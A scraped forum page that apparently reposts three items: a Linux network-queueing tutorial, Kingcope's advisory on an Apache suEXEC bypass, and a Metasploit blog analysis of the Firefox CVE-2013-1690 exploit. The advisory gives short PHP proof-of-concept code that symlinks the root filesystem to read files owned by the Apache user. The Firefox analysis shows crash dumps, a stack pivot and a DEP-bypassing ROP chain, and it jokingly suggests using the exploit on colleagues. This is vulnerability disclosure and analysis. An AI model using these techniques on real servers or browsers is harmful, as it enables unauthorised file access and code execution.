BQL reduces network latency by limiting the amount of queued data to the minimum required to avoid starvation. It also has the very important side effect of moving the point where most packets are queued from the driver queue, which is a simple FIFO, to the queueing discipline (QDisc) layer, which is capable of implementing much more complicated queueing strategies. The next section introduces the Linux QDisc layer.

Queuing Disciplines (QDisc)

The driver queue is a simple first in, first out (FIFO) queue. It treats all packets equally and has no capabilities for distinguishing between packets of different flows. This design keeps the NIC driver software simple and fast. Note that more advanced Ethernet and most wireless NICs support multiple independent transmission queues but similarly each of these queues is typically a FIFO. A higher layer is responsible for choosing which transmission queue to use.

Sandwiched between the IP stack and the driver queue is the queueing discipline (QDisc) layer (see Figure 1). This layer implements the traffic management capabilities of the Linux kernel which include traffic classification, prioritization and rate shaping. The QDisc layer is configured through the somewhat opaque tc command.
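As a small taste of tc before the concepts are introduced, the commands below sketch inspecting and replacing the root QDisc. This is an illustrative sketch only: eth0 is an assumed interface name and the commands require root privileges and a kernel with fq_codel support:

```shell
# Show the QDisc currently attached to eth0 (pfifo_fast by default)
tc qdisc show dev eth0

# Replace the root QDisc with fq_codel, a flow-aware queue with controlled delay
tc qdisc replace dev eth0 root fq_codel

# Remove the configured QDisc, reverting to the kernel default
tc qdisc del dev eth0 root
```

Note that `tc qdisc replace` works whether or not a root QDisc is already configured, which makes it convenient for scripts.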
There are three key concepts to understand in the QDisc layer: QDiscs, classes and filters.

The QDisc is the Linux abstraction for traffic queues which are more complex than the standard FIFO queue. This interface allows the QDisc to carry out complex queue management behaviours without requiring the IP stack or the NIC driver to be modified. By default every network interface is assigned a pfifo_fast QDisc which implements a simple three band prioritization scheme based on the TOS bits. Despite being the default, the pfifo_fast QDisc is far from the best choice because it defaults to having very deep queues (see txqueuelen below) and is not flow aware.

The second concept, which is closely related to the QDisc, is the class. Individual QDiscs may implement classes in order to handle subsets of the traffic differently. For example, the Hierarchical Token Bucket (HTB) QDisc allows the user to configure 500Kbps and 300Kbps classes and direct traffic to each as desired. Not all QDiscs have support for multiple classes – those that do are referred to as classful QDiscs.

Filters (also called classifiers) are the mechanism used to classify traffic to a particular QDisc or class. There are many different types of filters of varying complexity: u32 is the most general and the flow filter perhaps the easiest to use. The documentation for the flow filter is lacking but you can find an example in one of my QoS scripts.

For more detail on QDiscs, classes and filters see the LARTC HOWTO and the tc man pages.

Buffering between the transport layer and the queueing disciplines

In looking at the previous figures you may have noticed that there are no packet queues above the queueing discipline layer. What this means is that the network stack places packets directly into the queueing discipline or else pushes back on the upper layers (e.g. the socket buffer) if the queue is full. The obvious question that follows is what happens when the stack has a lot of data to send?
This could occur as the result of a TCP connection with a large congestion window or, even worse, an application sending UDP packets as fast as it can. The answer is that for a QDisc with a single queue, the same problem outlined in Figure 4 for the driver queue occurs. That is, a single high bandwidth or high packet rate flow can consume all of the space in the queue causing packet loss and adding significant latency to other flows. Even worse, this creates another point of buffering where a standing queue can form which increases latency and causes problems for TCP's RTT and congestion window size calculations. Since Linux defaults to the pfifo_fast QDisc which effectively has a single queue (because most traffic is marked with TOS=0) this phenomenon is not uncommon.

As of Linux 3.6.0 (2012-09-30), the Linux kernel has a new feature called TCP Small Queues which aims to solve this problem for TCP. TCP Small Queues adds a per-TCP-flow limit on the number of bytes which can be queued in the QDisc and driver queue at any one time. This has the interesting side effect of causing the kernel to push back on the application earlier which allows the application to more effectively prioritize writes to the socket. At present (2012-12-28) it is still possible for single flows from other transport protocols to flood the QDisc layer.

Another partial solution to the transport layer flood problem, which is transport layer agnostic, is to use a QDisc which has many queues, ideally one per network flow. Both the Stochastic Fairness Queueing (SFQ) and Fair Queueing with Controlled Delay (fq_codel) QDiscs fit this problem nicely as they effectively have a queue per network flow.

How to manipulate the queue sizes in Linux

Driver Queue

The ethtool command is used to control the driver queue size for Ethernet devices. ethtool also provides low level interface statistics as well as the ability to enable and disable IP stack and driver features.
The -g flag to ethtool displays the driver queue (ring) parameters:

[root@alpha net-next]# ethtool -g eth0
Ring parameters for eth0:
Pre-set maximums:
RX:             16384
RX Mini:        0
RX Jumbo:       0
TX:             16384
Current hardware settings:
RX:             512
RX Mini:        0
RX Jumbo:       0
TX:             256

You can see from the above output that the driver for this NIC defaults to 256 descriptors in the transmission queue. Early in the Bufferbloat investigation it was often recommended to reduce the size of the driver queue in order to reduce latency. With the introduction of BQL (assuming your NIC driver supports it) there is no longer any reason to modify the driver queue size (see below for how to configure BQL).

ethtool also allows you to manage optimization features such as TSO, UFO and GSO. The -k flag displays the current offload settings and -K modifies them.

[dan@alpha ~]$ ethtool -k eth0
Offload parameters for eth0:
rx-checksumming: off
tx-checksumming: off
scatter-gather: off
tcp-segmentation-offload: off
udp-fragmentation-offload: off
generic-segmentation-offload: off
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: off
tx-vlan-offload: off
ntuple-filters: off
receive-hashing: off

Since TSO, GSO, UFO and GRO greatly increase the number of bytes which can be queued in the driver queue, you should disable these optimizations if you want to optimize for latency over throughput. It's doubtful you will notice any CPU impact or throughput decrease when disabling these features unless the system is handling very high data rates.

Byte Queue Limits (BQL)

The BQL algorithm is self tuning so you probably don't need to mess with this too much. However, if you are concerned about optimal latencies at low bitrates then you may want to override the upper limit on the calculated LIMIT value. BQL state and configuration can be found in a /sys directory based on the location and name of the NIC.
On my server the directory for eth0 is:

/sys/devices/pci0000:00/0000:00:14.0/net/eth0/queues/tx-0/byte_queue_limits

The files in this directory are:

hold_time: Time between modifying LIMIT in milliseconds.
inflight: The number of queued but not yet transmitted bytes.
limit: The LIMIT value calculated by BQL. 0 if BQL is not supported in the NIC driver.
limit_max: A configurable maximum value for LIMIT. Set this value lower to optimize for latency.
limit_min: A configurable minimum value for LIMIT. Set this value higher to optimize for throughput.

To place a hard upper limit on the number of bytes which can be queued, write the new value to the limit_max file:

echo "3000" > limit_max

What is txqueuelen?

Often in early Bufferbloat discussions the idea of statically reducing the NIC transmission queue was mentioned. The current size of the transmission queue can be obtained from the ip and ifconfig commands. Confusingly, these commands name the transmission queue length differently:

[dan@alpha ~]$ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:18:F3:51:44:10
          inet addr:69.41.199.58  Bcast:69.41.199.63  Mask:255.255.255.248
          inet6 addr: fe80::218:f3ff:fe51:4410/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:435033 errors:0 dropped:0 overruns:0 frame:0
          TX packets:429919 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:65651219 (62.6 MiB)  TX bytes:132143593 (126.0 MiB)
          Interrupt:23

[dan@alpha ~]$ ip link
1: lo: mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:18:f3:51:44:10 brd ff:ff:ff:ff:ff:ff

The length of the transmission queue in Linux defaults to 1,000 packets which is a large amount of buffering especially at low bandwidths. The interesting question is what exactly does this variable control? This wasn't clear to me so I spent some time spelunking in the kernel source.
From what I can tell, the txqueuelen is only used as a default queue length for some of the queueing disciplines. Specifically:

pfifo_fast (Linux default queueing discipline)
sch_fifo
sch_gred
sch_htb (only for the default queue)
sch_plug
sch_sfb
sch_teql

Looking back at Figure 1, the txqueuelen parameter controls the size of the queues in the Queueing Discipline box for the QDiscs listed above. For most of these queueing disciplines, the "limit" argument on the tc command line overrides the txqueuelen default. In summary, if you do not use one of the above queueing disciplines or if you override the queue length then the txqueuelen value is meaningless.

As an aside, I find it a little confusing that the ifconfig command shows low level details of the network interface such as the MAC address, but the txqueuelen parameter refers to the higher level QDisc layer. It would seem more appropriate for ifconfig to show the driver queue size.

The length of the transmission queue is configured with the ip or ifconfig commands:

[root@alpha dan]# ip link set txqueuelen 500 dev eth0

Notice that the ip command uses "txqueuelen" but when displaying the interface details it uses "qlen" – another unfortunate inconsistency.

Queueing Disciplines

As introduced earlier, the Linux kernel has a large number of queueing disciplines (QDiscs) each of which implements its own packet queues and behaviour. Describing the details of how to configure each of the QDiscs is out of scope for this article. For full details see the tc man page (man tc). You can find details for each QDisc in 'man tc qdisc-name' (e.g. 'man tc htb' or 'man tc fq_codel'). LARTC is also a very useful resource but is missing information on newer features.

Below are a few tips and tricks related to the tc command that may be helpful:

The HTB QDisc implements a default queue which receives all packets if they are not classified with filter rules.
Some other QDiscs such as DRR simply black hole traffic that is not classified. To see how many packets were not classified properly and were directly queued into the default HTB class, see the direct_packets_stat in "tc qdisc show".

The HTB class hierarchy is only useful for classification, not bandwidth allocation. All bandwidth allocation occurs by looking at the leaves and their associated priorities.

The QDisc infrastructure identifies QDiscs and classes with major and minor numbers which are separated by a colon. The major number is the QDisc identifier and the minor number the class within that QDisc. The catch is that the tc command uses a hexadecimal representation of these numbers on the command line. Since many strings are valid in both hex and decimal (e.g. 10), many users don't even realize that tc uses hex. See one of my tc scripts for how I deal with this.

If you are using ADSL, which is ATM based (most DSL services are ATM based but newer variants such as VDSL2 are not always), you probably want to add the "linklayer adsl" option. This accounts for the overhead which comes from breaking IP packets into a bunch of 53-byte ATM cells. If you are using PPPoE then you probably want to account for the PPPoE overhead with the 'overhead' parameter.

TCP Small Queues

The per-socket TCP queue limit can be viewed and controlled with the following /proc file:

/proc/sys/net/ipv4/tcp_limit_output_bytes

My understanding is that you should not need to modify this value in any normal situation.

Oversized Queues Outside Of Your Control

Unfortunately not all of the oversized queues which will affect your Internet performance are under your control. Most commonly the problem will lie in the device which attaches to your service provider (e.g. DSL or cable modem) or in the service provider's equipment itself. In the latter case there isn't much you can do because there is no way to control the traffic which is sent towards you.
However, in the upstream direction you can shape the traffic to slightly below the link rate. This will stop the queue in the device from ever having more than a couple of packets. Many residential home routers have a rate limit setting which can be used to shape below the link rate. If you are using a Linux box as a router, shaping below the link rate also allows the kernel's queueing features to be effective. You can find many example tc scripts online including the one I use with some related performance results.

Summary

Queueing in packet buffers is a necessary component of any packet network, both within a device and across network elements. Properly managing the size of these buffers is critical to achieving good network latency especially under load. While static buffer sizing can play a role in decreasing latency, the real solution is intelligent management of the amount of queued data. This is best accomplished through dynamic schemes such as BQL and active queue management (AQM) techniques like Codel. This article outlined where packets are queued in the Linux network stack, how features related to queueing are configured and provided some guidance on how to achieve low latency.

Related Links

Controlling Queue Delay – A fantastic explanation of network queueing and an introduction to the Codel algorithm.
Presentation of Codel at the IETF – Basically a video version of the Controlling Queue Delay article.
Bufferbloat: Dark Buffers in the Internet – An early Bufferbloat article.
Linux Advanced Routing and Traffic Control Howto (LARTC) – Probably still the best documentation of the Linux tc command although it's somewhat out of date with respect to new features such as fq_codel.
TCP Small Queues on LWN
Byte Queue Limits on LWN

Thanks

Thanks to Kevin Mason, Simon Barber, Lucas Fontes and Rami Rosen for reviewing this article and providing helpful feedback.

Sursa: Queueing in the Linux Network Stack | Dan Siemon
  22. Yes, send us a PM with the IPs from which you cannot access the forum, because we are having some minor technical problems with the crystal balls we were using...
  23. [h=1]Apache suEXEC Privilege Elevation / Information Disclosure[/h]

Apache suEXEC privilege elevation / information disclosure
Discovered by Kingcope/Aug 2013

The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs.

With this bug, an attacker who is able to run PHP or CGI code inside a web hosting environment that is configured to use suEXEC as a protection mechanism is able to read any file and directory on the filesystem of the UNIX/Linux system with the user and group id of the Apache web server. Normally PHP and CGI scripts are not allowed to read files with the Apache user-id inside a suEXEC configured environment.

Take for example this apache-owned file and the php script that follows.

$ ls -la /etc/testapache
-rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache

Only user www-data should be able to read this file.

$ cat test.php
<?php
system("id; cat /etc/testapache");
?>

When calling the php file using a webbrowser it will show...

uid=1002(example) gid=1002(example) groups=1002(example)

...because the php script is run through suEXEC. The script will not output the file requested because of a permissions error.

Now if we create a .htaccess file with the content...

Options Indexes FollowSymLinks

and a php script with the content...

<?php
system("ln -sf / test99.php");
symlink("/", "test99.php"); // try builtin function in case
                            // system() is blocked
?>

in the same folder, we can access the root filesystem with the apache uid/gid by requesting test99.php. The above php script will simply create a symbolic link to '/'.
A request to test99.php/etc/testapache done with a web browser shows... voila! The file is read with the apache uid/gid.

The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case.

Version notes. It is assumed that all Apache versions are affected by this bug.

apache2 -V
Server version: Apache/2.2.22 (Debian)
Server built:   Mar 4 2013 21:32:32
Server's Module Magic Number: 20051115:30
Server loaded:  APR 1.4.6, APR-Util 1.4.1
Compiled using: APR 1.4.6, APR-Util 1.4.1
Architecture:   32-bit
Server MPM:     Worker
  threaded:     yes (fixed thread count)
    forked:     yes (variable process count)
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/worker"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_SYSVSEM_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D DYNAMIC_MODULE_LIMIT=128
 -D HTTPD_ROOT="/etc/apache2"
 -D SUEXEC_BIN="/usr/lib/apache2/suexec"
 -D DEFAULT_PIDLOG="/var/run/apache2.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="mime.types"
 -D SERVER_CONFIG_FILE="apache2.conf"

Cheers,
/Kingcope

Sursa: Apache suEXEC Privilege Elevation / Information Disclosure
  24. Here's that FBI Firefox Exploit for You (CVE-2013-1690)

Posted by sinn3r in Metasploit on Aug 7, 2013 5:02:42 PM

Hello fellow hackers, I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you. During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for a crackdown on child pornography. The security community was amazing: within hours, we found more information such as a brief analysis of the payload, a simplified PoC, the bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability.

Brief Analysis

The vulnerability was originally discovered and reported by researcher "nils". You can see his discussion about the bug on Twitter. A proof-of-concept can be found here. We began with a crash with a modified version of the PoC:

eax=72622f2f ebx=000b2440 ecx=0000006e edx=00000000 esi=07adb980 edi=065dc4ac
eip=014c51ed esp=000b2350 ebp=000b2354 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08            mov ecx,dword ptr [eax]  ds:0023:72622f2f=????????

EAX is a value from ESI. One way to track where this allocation came from is by putting a breakpoint at moz_xmalloc:

...
bu mozalloc!moz_xmalloc+0xc "r $t0=poi(esp+c); .if (@$t0==0xc4) {.printf \"Addr=0x%08x, Size=0x%08x\",eax, @$t0; .echo; k; .echo}; g"
...
Addr=0x07adb980, Size=0x000000c4
ChildEBP RetAddr
0012cd00 014ee6b1 mozalloc!moz_xmalloc+0xc [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\memory\mozalloc\mozalloc.cpp @ 57]
0012cd10 013307db xul!NS_NewContentViewer+0xe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer

The callstack tells us this was allocated in nsdocumentviewer.cpp, at line 497, which leads to the following function.
When the DocumentViewerImpl object is created while the page is being loaded, this also triggers a malloc() with size 0xC4 to store that:

nsresult
NS_NewContentViewer(nsIContentViewer** aResult)
{
  *aResult = new DocumentViewerImpl();
  NS_ADDREF(*aResult);
  return NS_OK;
}

In the PoC, window.stop() is called repeatedly to stop document parsing, except the calls are not actually terminated; they just hang. Eventually this leads to some sort of exhaustion which allows the script to continue, and the DocumentViewerImpl object lives on. And then we arrive at the next line: ownerDocument.write(). The ownerDocument.write() function is used to write to the parent frame, but its real purpose is to trigger xul!nsDocShell::Destroy, which deletes DocumentViewerImpl:

Free DocumentViewerImpl at: 0x073ab940
ChildEBP RetAddr
000b0b84 01382f42 xul!DocumentViewerImpl::`scalar deleting destructor'+0x10
000b0b8c 01306621 xul!DocumentViewerImpl::Release+0x22 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 548]
000b0bac 01533892 xul!nsDocShell::Destroy+0x14f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\docshell\base\nsdocshell.cpp @ 4847]
000b0bc0 0142b4cc xul!nsFrameLoader::Finalize+0x29 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsframeloader.cpp @ 579]
000b0be0 013f4ebd xul!nsDocument::MaybeInitializeFinalizeFrameLoaders+0xec [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 5481]
000b0c04 0140c444 xul!nsDocument::EndUpdate+0xcd [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 4020]
000b0c14 0145f318 xul!mozAutoDocUpdate::~mozAutoDocUpdate+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\mozautodocupdate.h @ 35]
000b0ca4 014ab5ab xul!nsDocument::ResetToURI+0xf8 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2149]
000b0ccc 01494a8b xul!nsHTMLDocument::ResetToURI+0x20
[e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 287]
000b0d04 014d583a xul!nsDocument::Reset+0x6b [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2088]
000b0d18 01c95c6f xul!nsHTMLDocument::Reset+0x12 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 274]
000b0f84 016f6ddd xul!nsHTMLDocument::Open+0x736 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1523]
000b0fe0 015015f0 xul!nsHTMLDocument::WriteCommon+0x22a4c7 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1700]
000b0ff4 015e6f2e xul!nsHTMLDocument::Write+0x1a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1749]
000b1124 00ae1a59 xul!nsIDOMHTMLDocument_Write+0x537 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\obj-firefox\js\xpconnect\src\dom_quickstubs.cpp @ 13705]
000b1198 00ad2499 mozjs!js::InvokeKernel+0x59 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 352]
000b11e8 00af638a mozjs!js::Invoke+0x209 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 396]
000b1244 00a9ef36 mozjs!js::CrossCompartmentWrapper::call+0x13a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jswrapper.cpp @ 736]
000b1274 00ae2061 mozjs!JSScript::ensureRanInference+0x16 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinferinlines.h @ 1584]
000b12e8 00ad93fd mozjs!js::InvokeKernel+0x661 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 345]

What happens next is that after ownerDocument.write() finishes, one of the window.stop() calls that used to hang begins to finish up, which brings us to xul!nsDocumentViewer::Stop. This function will access the invalid memory, and crashes.
At this point you might see two different racy crashes. Either it accesses some memory that was never meant for that CALL, simply because that part of memory happens to fit there, or you crash at mov ecx, dword ptr [eax], like the following:

0:000> r
eax=41414141 ebx=000b4600 ecx=0000006c edx=00000000 esi=0497c090 edi=067a24ac
eip=014c51ed esp=000b4510 ebp=000b4514 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????

0:000> u . L3
014c51ed 8b08            mov     ecx,dword ptr [eax]
014c51ef 50              push    eax
014c51f0 ff5104          call    dword ptr [ecx+4]

However, note that the crash doesn't necessarily have to end up in xul!nsDocumentViewer::Stop, because reaching this code path requires two conditions, as the following demonstrates:

DocumentViewerImpl::Stop(void)
{
  NS_ASSERTION(mDocument, "Stop called too early or too late");
  if (mDocument) {
    mDocument->StopDocumentLoad();
  }

  if (!mHidden && (mLoaded || mStopped) && mPresContext && !mSHEntry)
    mPresContext->SetImageAnimationMode(imgIContainer::kDontAnimMode);

  mStopped = true;

  if (!mLoaded && mPresShell) {
    // These are the two conditions that must be met.
    // If you're here, you will crash.
    nsCOMPtr<nsIPresShell> shellDeathGrip(mPresShell);
    mPresShell->UnsuppressPainting();
  }

  return NS_OK;
}

We discovered the above possibility because the exploit in the wild uses a different path to reach "call dword ptr [eax+4BCh]" in the function nsIDOMHTMLElement_GetInnerHTML, meaning that it actually survives xul!nsDocumentViewer::Stop. It also uses an information leak to properly craft an NTDLL ROP chain specifically for Windows 7.
The following example, based on the exploit in the wild, should demonstrate this. We begin with the stack pivot:

eax=120a4018 ebx=002ec00c ecx=002ebf68 edx=00000001 esi=120a3010 edi=00000001
eip=66f05c12 esp=002ebf54 ebp=002ebf8c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
xul!xpc_LocalizeContext+0x3ca3f:
66f05c12 ff90bc040000    call    dword ptr [eax+4BCh] ds:0023:120a44d4=33776277

We can see that the pivot is an XCHG EAX,ESP from NTDLL:

0:000> u 77627733 L6
ntdll!__from_strstr_to_strchr+0x9b:
77627733 94              xchg    eax,esp
77627734 5e              pop     esi
77627735 5f              pop     edi
77627736 8d42ff          lea     eax,[edx-1]
77627739 5b              pop     ebx
7762773a c3              ret

After pivoting, it runs through the whole NTDLL ROP chain, which calls ntdll!ZwProtectVirtualMemory to bypass DEP, and then finally gains code execution:

0:000> dd /c1 esp L9
120a4024  77625f18 ; ntdll!ZwProtectVirtualMemory
120a4028  120a5010
120a402c  ffffffff
120a4030  120a4044
120a4034  120a4040
120a4038  00000040
120a403c  120a4048
120a4040  00040000
120a4044  120a5010

Note: The original exploit does not seem to work against Mozilla Firefox 17 (or other vulnerable versions) other than the Tor Browser, but you should still get a crash. We figure whoever wrote the exploit didn't really care about regular Firefox users, because apparently they have nothing to hide.

Metasploit Module

Because of the complexity of the exploit, we've decided to do an initial release for Mozilla Firefox for now. An improved version of the exploit is already on the way, and hopefully we can get that out as soon as possible, so keep an eye on the blog and msfupdate, and stay tuned. Meanwhile, feel free to play FBI in your organization: exercise that exploit on your next social engineering training campaign.

Mitigation

Protecting against this exploit is typically straightforward: all you need to do is upgrade your Firefox browser (or the Tor Browser Bundle, which was the true target of the original exploit).
The vulnerability was patched and released by Mozilla back in late June 2013, and the TBB was updated a couple of days later, so the world has had a little over a month to get onto the patched versions. Given that, it would appear that the original adversaries here had reason to believe that, at least as of early August 2013, their target pool had not patched. If you're at all familiar with Firefox's normal updates, it's difficult to avoid getting patched; you need to go out of your way to skip updating, and you're more likely than not to screw that up and get patched by accident. However, since people using Tor services often rely on read-only media, like a LiveCD or a read-only virtual environment, it's slightly more difficult for them to get timely updates. Doing so means burning a new LiveCD, or marking their VM as writable to make updates persistent. In short, it looks like we have a case where good security advice ("don't save anything on your secret operating system") got turned into poor operational security practice, violating the "keep up on security patches" rule. Hopefully, this is a lesson learned.

Source: https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690
  25. Decrypting the keys? Or do you mean the possibility of brute-forcing 128-bit keys? Here's a simple, concrete example: if the NSA needed $1 million worth of GPUs/CPUs to quickly crack a 128-bit AES key, then cracking a 256-bit key would take 2^128 times as much, on the order of $3.4 × 10^44, since every extra key bit doubles the size of the keyspace.